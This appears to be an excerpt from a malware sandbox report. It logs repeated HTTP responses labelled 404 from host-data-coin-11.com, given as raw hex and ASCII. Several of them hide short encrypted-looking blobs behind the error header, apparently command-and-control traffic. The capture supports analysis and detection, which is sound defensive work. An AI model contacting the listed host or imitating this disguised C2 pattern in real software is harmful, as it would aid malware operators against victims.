                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 48 e5 af 8d 70 bc 57 dd 40 d6 f6 2e 84 2a e8 c3 90 53 2e ef a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9HpW@.*S.c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 80 49 08 25 01 e5 e9 8d b0 a2 37 0d 0a 30 0d 0a 0d 0a Data Ascii: 1fI:82OI%70
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 67 5d a4 09 d7 cd 66 c7 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OTevg]fdP0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 